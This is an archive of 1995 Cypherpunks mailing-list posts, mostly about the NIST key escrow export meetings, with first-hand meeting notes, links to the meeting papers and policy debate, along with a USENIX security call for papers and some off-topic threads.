MIME-Version: 1.0
Content-Type: text/plain


  John Young <jya@pipeline.com>  writes:

> Perhaps someone, Pat Farrell or another, would be willing
> to make them available on a homepage or ftp site. If so we
> will send them over.

I will gladly put up any nist-meeting papers, comments, drafts, etc.
on my webpage. Please send them to me. (pfarrell@netcom.com)

I am even willing to type in some, but that is known to cause typos,
as I can't type, and even spellcheckers can't tell real words
such as 'sham' from 'shame'

Right now, I'm pretty down on the two days, but let's keep the information
flowing.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 20:40:09 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950907221236.5719A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.950907233749.7150A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 7 Sep 1995, Black Unicorn wrote:

> > Telecoms will certainly break the professional 
> > monopoly of lawyers (and other professionals).
> 
> This I don't.  How do you mean exactly?

Licensing requires the ability to outlaw unlicensed transactions.  
Since the Net trumps censorship and allows consultations at a 
distance, it cracks licensing.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Terrell@sam.neosoft.com)
Date: Wed, 20 Sep 95 17:27:56 PDT
To: cypherpunks@toad.com
Subject: RE: GAK
Message-ID: <9509201549166094@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 07 Sep 1995 18:42:06 -0500
To: cypherpunks@toad.com
From: terrell@sam.neosoft.com (Buford Terrell)
Subject: Re: GAK

>Date: Sun, 3 Sep 1995 21:25:26 -0400 (EDT)
>From: Brian Davis <bdavis@thepoint.net>

>Subject: Re: GAK

>On Fri, 1 Sep 1995, Timothy C. May wrote:
>
>> At 10:56 PM 9/1/95, Buford Terrell wrote:
>> 
>> >If you've ever watched Not_at_all_Funny Home Videos or any of the
>> >American Urinal school of tabloid television, you soon start feeling
>> >that the real threat to privacy is not the guvmint, but all of
>> >the yoyos with their little cam corders running around pointing them
>> >at people.
>> >
>> >Security cameras in ATMS and at airline ticket counters do more
>> >to threaten your privacy than do FIBBIE wiretaps, and PGP won't
>> >protect you from them. (and usually neither will the courts).
>> 
>> I absolutely agree with this, though this doesn't mean I'll stop worrying
>> about the government's plans for key escrow (GAK), about limits on key
>> lengths, or about other efforts to thwart strong security.
>
>I, of course, know of the "dislike" of GAK here.  I am curious to know, 
>however, if the "dislike" is because government would have access under 
>any circumstances or if the primary worry is that government will cheat 
>and get access when most would agree that they shouldn't (either by the 
>judge "cheating" or a TLA stealing it).
>
>In other words ... if it took agreement by a review board composed of 
>non-LEA members of this list, would the escrow be acceptable??
>
>EBD
>
In my case, it's simply a matter of principle: the government has no
right to know what I'm saying.  Search warrants may allow them to
get to "things" that I have, but the First and Fifth amendments make
words sacred.  If the government can eavesdrop on my conversation,
then my speech is no longer free.

A review board consisting of cypherpunks has no more right to listen
to my private conversations than does the FBI, so I would not agree
to that proposal either.

  --buford





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 00:00:48 PDT
To: trei@process.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <199509080700.AAA23137@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 AM 9/7/95 -6, Peter Trei wrote:
>"If keys are escrowed, what purpose does a 64 bit limit serve?"
A 64 bit limit serves lots of purposes, like letting the NSA crack stuff;
I suspect escrow is being used as an excuse to get big vendors to
standardize on wimpy 64-bit crypto as much as anything else.


>Secondarily, I observe that this apparently precludes the use of OTP.

Not to the devious (though the devious may not be able to get export approval)
After all, you could escrow a _lot_ of 32-bit OTPs :-)

(yeah, I know, the requirement that you identify which escrowed key is being
used makes that less than useful, unless the final standard comes out with
clear, unambiguous language which fails to cover all cases and can
therefore be abused - that's one problem with the current "ask the NSA" rule.)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Thu, 7 Sep 95 21:06:29 PDT
To: cypherpunks@toad.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <199509080406.AAA25183@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


>I hope this gets to you before the conference is over. I would REALLY
>like to hear the government response to the question:

>"If keys are escrowed, what purpose does a 64 bit limit serve?"

I thought that Bruce Schneier (sp?) had a good point at DefCon:
(something like:) "The US Government thinks that there is a type
of criminal smart enough to use encryption and dumb enough to 
use encryption provided by the US Government..."(lots of applause).

I think that is a good point.  Of course, if all non-escrowed
encryption techniques were made illegal, then the criminals would
just have another broken law under their belt if they used
strong encryption.  After all, an outlaw is an outlaw because
he has broken laws, so what sense does it make to make more
laws for him to break?  Hmph.  

Also, semi unrelated: How do the copyright, pornography, and
California Penal Code 502.7 laws fit in with the first
amendment?

[Please send a cc: of any replies to dr261@cleveland.freenet.edu
because I am no longer on cypherpunks )-:  I can't handle the
mail volume any longer now that I have homework to do.. <g>]

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Fri, 8 Sep 95 00:10:47 PDT
To: Patrick Horgan <patrick@Verity.COM>
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <9509071507.AA08037@cantina.verity.com>
Message-ID: <Pine.BSD.3.91.950908000635.8478A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Patrick Horgan wrote:

> I know who you're referring to by saying co$, but what do co$ mean?
> Co-DollarSign?  Co-Dollar?
> 

Church of $cientology  [the $ replacing the S because their true goal is 
profit, not help]


||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Thu, 7 Sep 95 23:35:23 PDT
To: don@cs.byu.edu
Subject: Re: Announce: Web of Trust Ring
In-Reply-To: <199509071832.MAA00480@wero.byu.edu>
Message-ID: <199509080635.AAA01087@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> WEB OF TRUST KEYRING GENERATION PROJECT
> 
> I have completed my project to make a condensed version of the keyserver
> PGP keyrings, containing only the "web of trust" inter-related keys. My
> methods were rather crude, and unfortunately only extracted those people
> who have signed someone (already on the list) else's key. That means that
> people who are well connected on the web of trust are included, while
> those people who only receive signatures from well-connected people are
> not included.


A very interesting project!  Can you give us some data like how many is the
maximum number of hops necessary to connect two people on the WoT?  (I am
aware that one wouldn't want to trust such a connection, and that PGP doesn't
actually allow you to do so for hops > 2...)


(P.S.  I guess "12" based on the number of passes necessary.  That seems like
a really high number to me...)


Are any obvious pseudonyms in?  (I would guess not.)


I wonder what sorts of statistical analyses could be done on this WoT?  Is it
fairly evenly spread out or are there noticeably larger "clumps" of mutual
signatures?  How many keys *are* there in this (subset of the) WoT?


Here's a question:  for two randomly selected members of your WoT, how many
signatures would a Man In The Middle have to fake in order to isolate the one
member from the other?


Thanks for this, Don.


Bryce

signatures follow:


                                    +                                           
      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Bryce's Auto-PGP v1.0beta3

iQCVAwUBME/kDPWZSllhfG25AQHGFAQApDoogEs7Dv8+ncQYAR7NUStvL2acs9x3
j5aEeF/GpA6kKZD/Rw6FO5vqCXol/fJ0oGgwgTBPzJAF2ZfUQ6P1KQJweAebDuNs
2JlBjEkTpaDgQ6PwPFwzEr02nP06wE0mF5ssdDvd2LcIbVdDY2XB7jyXh4+AC1fP
+lRujkScF0M=
=/ef6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 7 Sep 95 21:38:16 PDT
To: cypherpunks@toad.com
Subject: Usenix symposium on crypto applications
Message-ID: <9509080437.AA08201@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Newsgroups: comp.org.usenix,comp.org.uniforum,comp.org.sug,comp.unix.admin,comp.unix.large,comp.org.decus,comp.security.unix
Path: paperboy.osf.org!bone.think.com!blanket.mitre.org!agate!spool.mu.edu!howland.reston.ans.net!tank.news.pipex.net!pipex!in2.uu.net!usenix!toni
>From: toni@usenix.org (Toni Veglia)
Subject: 6th USENIX UNIX Security Symposium - Call-for-Papers
Message-ID: <DEI0Mp.4L7@usenix.org>
Reply-To: toni@usenix.org (Toni Veglia)
Organization: USENIX Association, Berkeley, CA
Date: Wed, 6 Sep 1995 19:25:37 GMT
Lines: 218
Xref: paperboy.osf.org comp.org.usenix:3623 comp.org.uniforum:20 comp.org.sug:940 comp.unix.admin:33851 comp.unix.large:1699 comp.org.decus:6147 comp.security.unix:19702


      Announcement and Preliminary Call for Papers

	   6th USENIX UNIX Security Symposium
	Focusing on Applications of Cryptography
		     July 22-25, 1996
		      Fairmont Hotel
		   San Jose, California


Sponsored by the USENIX Association, the UNIX and
Advanced Computing Systems Professional and
Technical Association

Co-sponsored by UniForum (pending)
In cooperation with: The Computer Emergency
Response Team (CERT), and IFIP WG 11.4

Important Dates

Dates for Refereed Paper Submissions 
Extended abstracts due:                 Mar 19, 1996 
Program Committee decisions made:       Apr 15, 1996
Camera-ready final papers due:          June 10, 1996

Registration Materials Available:  End April 1996

Program Committee
Program Chair:  Greg Rose, Sterling Software.

Fred Avolio, Trusted Information Systems, Inc.
Steve Bellovin, AT&T Bell Laboratories
Brent Chapman, Great Circle Associates
Diane Coe, Mitre
Ed DeHart, CERT
Dan Geer, Open Market Inc.
Peter Gutmann, University of Auckland
Kent Landfield, Sterling Software
Clifford Neuman, Information Sciences Institute
Avi Rubin, Bellcore
Eugene Spafford, COAST Laboratory, Purdue University
Ken van Wyk, Defense Information Systems Agency
Karen Worstell, The Boeing Company

Readers: Matt Bishop, U.C. Davis; Phil Karn, Qualcomm

Overview

The goal of this symposium is to bring together
security and cryptography practitioners,
researchers, system administrators, systems
programmers, and others with an interest in
applying cryptography, network and computer
security, and especially the area where these
overlap. The focus on applications of
cryptography is intended to attract papers in the
fields of electronic commerce and information
processing, as well as security. Please note that
papers about new cryptographic algorithms are not
solicited; however new applications are.

This will be a four day single track symposium
with tutorials, refereed and technical
presentations, and panel discussions.  Tutorials
will take place the first two days followed by
two days of technical sessions.

Tutorials
July 22-23

Tutorials for both technical staff and managers
will provide immediately useful, practical
information on topics such as local and network
security precautions, what cryptography can and
cannot do, security mechanisms and policies,
firewalls and monitoring systems.

Technical Sessions
July 24-25

In addition to the keynote presentation, the
technical program includes refereed papers and
invited talks. There may be panel sessions.
There will be Birds-of-a-Feather sessions and
Works-in-Progress Reports on two evenings. You
are invited to make suggestions to the program
committee via email <security@usenix.org>.

Papers that have been formally reviewed and
accepted will be presented during the symposium
and published in the symposium proceedings.
Proceedings of the symposium will be published by
USENIX and will be provided free to technical
session attendees; additional copies will be
available for purchase from USENIX.

Symposium Topics 

Presentations are being solicited in areas
including but not limited to: 

	*Anonymous transactions
	*Applications of cryptographic techniques
	*Attacks against secure networks/machines
	*Cryptanalysis and codebreaking as attacks
	*Cryptographic tools
	*Electronic commerce security
	*Firewalls and firewall toolkits
	*Legislative and legal issues
	*Case studies
	*Computer misuse and anomaly detection
	*File and File system security
	*Network security
	*Security and system management
	*Security in heterogeneous environments
	*Security incident investigation and response
	*Security tools
	*User/system authentication
	*Penetration testing
	*Malicious code analysis

Note that this symposium is not about new codes
or ciphers, or cryptanalysis for its own sake.

How to Submit a Refereed Paper

Submissions must be received by Mar 19, 1996.
Authors are encouraged to submit an extended
abstract which discusses key ideas and
demonstrates the structure of the finished
paper.  Extended abstracts should be 3-5 pages
long (about 1500-2500 words), not counting
references and figures.  The body of the extended
abstract should be in complete paragraphs.  The
object of an extended abstract is to convince the
reviewers that a good paper and presentation will
result.  Full papers can be submitted if they are
complete in advance of the date.  Full papers
should be 8 to 15 typeset pages.

Authors will be notified of acceptance on April
15, 1996.

All submissions will be judged on originality,
relevance, and correctness.  Each accepted
submission will be assigned a member of the
program committee to act as its shepherd through
the preparation of the final paper.  The assigned
member will act as a conduit for feedback from
the committee to the authors.  Camera-ready final
papers are due June 10, 1996.

Please accompany each submission by a cover
letter stating the paper title and authors along
with the name of the person who will act as the
contact to the program committee.  Please include
a surface mail address, daytime and evening phone
number, and, if available, an email address and
fax number for the contact person.

If you would like to receive detailed guidelines
for submission and examples of extended
abstracts, you may send email to:

	securityauthors@usenix.org

or telephone the USENIX Association office at
+1 510 528 8649.

The UNIX Security Symposium, like most
conferences and journals, requires that papers
not be submitted simultaneously to another
conference or publication and that submitted
papers not be previously or subsequently
published elsewhere.  Papers accompanied by
"non-disclosure agreement" forms are not
acceptable and will be returned to the author(s)
unread.  All submissions are held in the highest
confidentiality prior to publication in the
Proceedings, both as a matter of policy and in
accord with the U.S. Copyright Act of 1976.

Where To Submit

Please send one copy of an extended abstract or a
full paper to the program committee via each of
two, for reliability, of the following methods.
All submissions will be acknowledged.

  o Preferred Method: email (Postscript or ASCII) to:
        securitypapers@usenix.org

  o Alternate Method: postal delivery to
       Security Symposium
       USENIX
       2560 Ninth St., Ste. #215
       Berkeley CA 94710
       U.S.A.
       Phone: +1 510 528 8649

  o Fax: +1 510 548 5738

Registration Materials

Materials containing all details of the technical and tutorial
programs, registration fees and forms, and hotel information
will be available at the end of April 1996.  If you wish to
receive the registration materials, please contact USENIX at:

             USENIX Conference Office
             22672 Lambert Street, Suite 613
             Lake Forest, CA USA   92630
             +1 714 588 8649; Fax: +1 714 588 9706
             email: conference@usenix.org

Information can also be found under the USENIX Association
WWW page URL:  http://www.usenix.org
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 7 Sep 95 22:00:47 PDT
To: Yih-Chun Hu <yihchun@u.washington.edu>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.OSF.3.91j.950907213051.24322B-100000@saul3.u.washington.edu>
Message-ID: <Pine.D-G.3.91.950908010627.4194D-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Yih-Chun Hu wrote:

> On Thu, 7 Sep 1995 hallam@w3.org wrote:
> 
> Whatever. Clinton proposed crypto, some democrat wrote the electronic
            ^^^^^^^^^^^^^^^^^^^^^^^
Sorry.  Clipper precedes Clinton.    



> decency act. (In fact Gingrich was against it)


EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Thu, 7 Sep 95 22:46:38 PDT
To: cypherpunks@toad.com
Subject: Magazine / Goodbye
Message-ID: <199509080546.BAA27342@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello, everyone.. <warning: semi off-topic post> I am posting
this to let everyone know that I am starting a semitechnical
magazine titled _The_Carrier_Wave_.  It will be published every
two months to begin with, and hopefully monthly if I receive
enough material.  I am requesting articles, columns, news, 
bits, etc..  Whenever anything -interesting- happens, I'd
appreciate it if someone could write a long or short blurb
about it and forward it to me.  Events, meetings, tradeshows,
milestones, new algorithms...  Stories about PGP, Clipper,
etc... Use this to get the word out.  If someone could
run a "Cryptography Column" or "CryptoNews" or a Cypherpunks
column, that would be great... If you are interested, please
send me mail at dr261@cleveland.freenet.edu..  Also note, I
have unsubscribed to Cypherpunks because I will be very
busy lately and an overflowing mailbox is undesirable.
Thanks!
!!!

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 8 Sep 95 02:10:18 PDT
To: cypherpunks@toad.com
Subject: Key Escrow Papers via FTP
Message-ID: <199509080910.CAA04960@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


The papers on Key Escrow scanned by John Young are available for FTP from:

ftp://ftp.teleport.com/pub/users/alano/nist.zip

They have been separated into separate text files (7 in all).

I will have an HTML version available from my web page soon.  (I am in the
process of converting the text to something HTMLlike.)

Comments/flames/etc can be sent my way, to John Young (jya@pipeline.com)
and/or to /dev/null (davenull@netscape.com).

Enjoy!
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 7 Sep 95 23:31:04 PDT
To: Yih-Chun Hu <yihchun@u.washington.edu>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.OSF.3.91j.950907213051.24322B-100000@saul3.u.washington.edu>
Message-ID: <Pine.SUN.3.91.950908022449.14802D-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Yih-Chun Hu wrote:

> > The problem is currently with the right wing, right wing democrats such as 
> > Clinton and practically all the Republicans. 
> > 
> 
> Whatever. Clinton proposed crypto, some democrat wrote the electronic
> decency act. (In fact Gingrich was against it)

Well, Gingrich SAID he was against it.  But he hedged even on that, and 
he certainly didn't DO anything about his opposition to it, unlike his 
actions with regard to things he truly supports.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 8 Sep 95 00:12:11 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why Key Escrow (GAK) is So Bad
Message-ID: <v02130509ac757ea3c107@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:22 9/7/95, Timothy C. May wrote:
>(Ironically, I just heard about a case in Texas where a judge ordered a
>mother to stop speaking in Spanish to her child at home, calling it "child
>abuse." The implications of this are self-evident.)

You have the facts slightly wrong. The order was not to stop talking Spanish
and to use English but only to Not use Spanish EXCLUSIVELY but to also use
English (so as to allow the Child to Grow up in a Bilingual Environment).
Waiting until the child was old enough to go to school would put the Child
at a disadvantage in learning English since the window of Chance for
Language Skill Pickup would have closed.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Fri, 8 Sep 95 03:33:25 PDT
To: pfarrell@netcom.com
Subject: NIST notes available
Message-ID: <199509081030.DAA06056@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to John Young, I have placed the text of the handouts
from Wednesday's and Thursday's meetings on my Nist pages.
url: http://www.isse.gmu.edu/~pfarrell/nistmeeting.html

It is my belief that this meeting was a staged presentation. 
Nearly every industry representative
said that this was a fatally flawed idea. It was 
"a non-starter." The government representatives
said that they heard the comments, but insisted on proceeding. 

The most depressing presentation was Thursday morning, made
by a high level Dept of Justice flack. I'll have to dig out my
notes, his name was Geoff G...
He presented the usual drug dealer, pedophile and terrorist line,
and added corrupt government officials. He pretended to talk about
foreign bad guys. Nearly all were domestic. He clearly wants
weak GAK so that he can decrypt anything domestically that
he wants.

It is clear to me that the government intends that industry 
provide crippled encryption "for export"
with the never stated expectation that since industry has 
repeatedly said that they want only one
version of products, capable of being sold worldwide, 
that Domestic products will be crippled. 

It is equally clear from representatives of IBM, Compaq, DEC, 
Lotus, and others that I talked to, that crypto product 
development will simply move offshore. Ireland, Israel, 
and Germany already have significant experience in 
developing commercial software. 

It is depressing to hear our Commerce department chasing technology 
and jobs overseas.

GAK is bad enough. Weak GAK makes me gag.

Pat
 
Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Fri, 8 Sep 95 02:06:18 PDT
To: cypherpunks@toad.com
Subject: Re: Why Key Escrow (GAK) is So Bad
Message-ID: <v01510106ac75c4787549@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>At 10:22 9/7/95, Timothy C. May wrote:
>>(Ironically, I just heard about a case in Texas where a judge ordered a
>>mother to stop speaking in Spanish to her child at home, calling it "child
>>abuse." The implications of this are self-evident.)
>
>You have the facts slightly wrong. The order was not to stop talking Spanish
>and to use English but only to Not use Spanish EXCLUSIVELY but to also use
>English (so as to allow the Child to Grow up in a Bilingual Environment).
>Waiting until the child was old enough to go to school would put the Child
>at a disadvantage in learning English since the window of Chance for
>Language Skill Pickup would have closed.

(drifting wildly off topic...)

Consider me exhibit A that speaking only German in the home until age 17
does not diminish one's language skills. In fact, (drifting...) it was only
until I began speaking English to the exclusion of German that my language
skills began to decline.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMFAVMnIf3YegbdiBAQGHEQJWLnmpNDvyxYnj92AB+nQXcR3ys0TorYVQ
EoIAJAi+hyARme8291R7Ky6PeCdGNXOlEVpdVchh2MO/rpgI/Zn1OwjaPMpFrFZd
1ph7
=M/sp
-----END PGP SIGNATURE-----

Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    |        PGP Public Key              /goedel/key.txt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joelm@eskimo.com)
Date: Wed, 20 Sep 95 17:17:59 PDT
To: cypherpunks@toad.com
Subject: NIST ESCROW PAPERS - NOW WEB AVAILABLE
Message-ID: <9509201549226130@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 07 Sep 1995 21:28:59 -0700
To: cypherpunks@toad.com
From: Joel McNamara <joelm@eskimo.com>
Subject: NIST Escrow Papers - Now Web Available

Several of the scanned hand-outs (courtesy of John Young) for the NIST Septembe

http://www.eskimo.com/~joelm

Papers include: 

The outlines of meeting topics of Raymond Kammer of NIST and Michael Nelson of 

Discussion Paper No. 4, "Example Potential Solutions for the Draft Export Crite

The Business Software Alliance's dissenting blast at the government's key escro

Trusted Informations Systems's "Thoughts on the NIST Escrow Issues Meeting Disc

TECSEC Incorporated's "Private Escrow Key Management: A Method and its Issues."

Dorothy Denning's "Comments on Draft Criteria for Software Key Escrow Exportabi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 8 Sep 95 03:30:45 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Legality of Cash Transactions
In-Reply-To: <ac74e578310210048bf7@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950908060000.4358A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 7 Sep 1995, Timothy C. May wrote:

> Try buying a car with cash, especially a car costing over $10,000.
> 
> Black Unicorn posted an account a while back (sometime last year) of his
> efforts to pay cash for a new car.

It occurred to me that the four cars I've bought in my life have been paid 
for in cash.  Of course my taste for 10-year-old cars makes it easier to 
keep the price under $10,000.  Indeed, I think the most I've ever paid 
was less than $3100.

DCF

"Too bad for Packwood he didn't hack two people to death with a knife.  
He might have gotten off."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Fri, 8 Sep 95 06:39:12 PDT
To: pfarrell@netcom.com
Subject: Day 2, nist GAK meeting
Message-ID: <199509081336.GAA16190@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Date: Fri, 8 Sep 1995 09:32:43 -0400 (EDT)
From: "Pat Farrell" <pfarrell@127.0.0.1>
To: cypherpunks@toad.com
Cc: 
BCc: 
Subject: Day 2 NIST meeting notes
X-NUPop-Charset: IBM 8-Bit


Thursday's GAK Export meeting started with reports from the prior
afternoon's breakout meetings. I reported on the session I was in,
saying what I posted to the list yesterday (about National Semi's product,
etc.) The other breakout groups reported their problems with the
criteria, again asking that #9 be dropped, longer keys, etc.
The presentation for Group "A" was different. It was a speech.
It asked that the process be stopped to let industry develop
market-driven solutions. It was greeted by applause from the
vendors and privacy advocates, with no reaction from the
government representatives.

Randy Williams of Commerce, and Dan Cook of State, described the
current export approval process. Lots of talk of jurisdictions
and types of licenses. I quickly got lost in the jargon.
The moderator wisecracked that the official language of the session
was English. You couldn't tell from some of the exchanges.

They were questioned on import restrictions. Both Williams and Cook
said that there are no import restrictions into the US. They also
pointed out that Treasury, not State or Commerce, has jurisdiction over
imports.

An engineer from Compaq asked a question: He said that his company
buys licenses to software, and bundles it as "value added" to
their systems. They are interested in bundling in security features.
He asked if his computers would then be subject to export restrictions.
The answer was yes. He asked if he could purchase security software
overseas and import it. The answer was again yes. He asked if
he could install that software on his computers, again yes. And
export the computers, NO. They didn't even seem to think that this
was illogical.

So Commerce, State, and the rest of the government are actively
encouraging the development of competing software industries in
Israel, Germany and other countries. I hate to think what they'd
do if they tried to hurt US industry.

An interesting tidbit came up after the session. In an offline
conversation, the topic of "personal use export" came up. A
reliable source said that revised regulations are being developed,
and will be available soon. I explicitly asked if this meant
"PGP on a notebook computer" and was told, Yes, that will be allowed;
with the usual rules that it can't be for export, you can't be attempting
to sell it, etc. Personal use, carry out and carry back. The "source" was
asked if they had read Matt Blaze's personal use disaster story.
The name didn't ring a bell, but the story was well known and considered
a nightmare.

Penny Brummitt of NSA was to talk about Clipper's key escrow agents,
but called in sick. I didn't catch the name of the replacement.
He talked about Clipper's process, not as an example of what will
be required for GAK agents, but as an "existence proof" that some
agents can be found.  The essence was that Clipper escrow facilities are
strong, and staffed with people cleared to the "Secret" level. They also
tossed out the phrase "US Person" in regard to the corporate entity that is
responsible for the contract.

Geoff Greiveldinger, of the US Department of Justice, gave a frequently
inaudible recounting of the evils of strong encryption in the war
on D, P, & T, and also corrupt mayors. He was very personable. He also
sounded like a fascist. Throughout the meeting, all sides tried to
have a civil discussion, even though we disagreed. It was
impossible to stay civil through his drivel. Ruby Ridge and Furman
had been unmentionable up until his speech.

Mr. Greiveldinger said that acceptable escrow agents will be in the US.
This caused considerable concern among vendors trying to sell
in the International market.

Dan Weitzer of CDT (the EFF spinoff) gave a short, rousing speech. It
was a call to arms. He said that since NIS&T was ignoring the
consistent input from industry to stop this silly and stupid GAK, that
we need to immediately contact our congresscritters.

Ken Mendelsen [sic?] of TIS gave a great speech. He suggested that
the criteria for escrow agents be the same as the form to export tanks
and other munitions. Then he showed the one page form used by State.
He argued that legislative solutions to the escrow agent approval process
will take too long and kill the effort. I'll try to get copies of his
presentation.

F.W. Gerbracht, Jr., a VP at Merrill Lynch, represented the Securities Industry
Association. He said that they are willing to work with the government,
but they need long keys, strong ciphers, and international escrow agents.
He used the phrase "unlimited algorithms and keyspace" as a requirement.
They also need buy in from their regulators, and presented a long list
of SEC, CFT, NYSE, NASDealers, and 50 state regulators, all who have
to sign off.

Nanette DiTosto of Bankers Trust gave a short, to the point presentation.
She said that BT has a commercial key escrow service, but that was not
what she wanted to get across. She said that multinational banks demand
strong encryption and non-US escrow agents. And that they would
settle for nothing less.

A speaker from VTW gave a nice presentation. VTW is something like
voter's telecommunications watch. They have a mailing list, at
listproc@vtw.org. He said that escrow was doomed to failure. That there
is no middle ground. I'll try to get his slides too.

Jack Wack of TECSEC gave a pitch for his shrinkwrapped product. He
said it is exportable now, they've jumped through all the hoops.
He also gave a great crack from his son. It went roughly like:
"Dad, if you own the data before you encrypt it, how come the
government says you don't own it after you encrypt it?"
It brought down the house. (if someone has a more accurate quote, please
let me have a copy).

Professor Hoffman of George Washington gave a great speech. He listed
the Al Gore to Maria Cantwell letter's criteria, as a matrix. He then
filled in the matrix with the Export GAK's criteria. It was painfully
obvious that the NIST/NSA proposal didn't come close. He recommended
that they focus closely on the Gore criteria, and come up with an
approach that meets all the criteria.

While I planned on staying for the remainder of the meeting, a crisis
came up at my day job. I can't say I was looking forward to more,
a day and a half was enough for me, and I wasn't the only person leaving
